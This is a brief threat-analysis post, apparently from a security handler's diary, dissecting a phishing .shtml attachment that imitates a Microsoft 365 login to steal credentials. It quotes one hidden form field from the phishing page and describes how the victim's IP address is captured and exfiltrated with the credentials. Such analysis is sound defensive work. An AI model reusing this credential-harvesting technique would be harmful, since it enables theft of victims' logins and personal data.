Last Updated: 2023-05-20 10:06:24 UTC
by Xavier Mertens (Version: 1)
While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called "PROFORMA INVOICE.shtml". Right now, nothing special, emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:
The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTTP form:
<input type="hidden" name="ip" id="hIP">
The line in red assigns the victim's public IP address to hIP that will be exfiltrated with the credentials.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant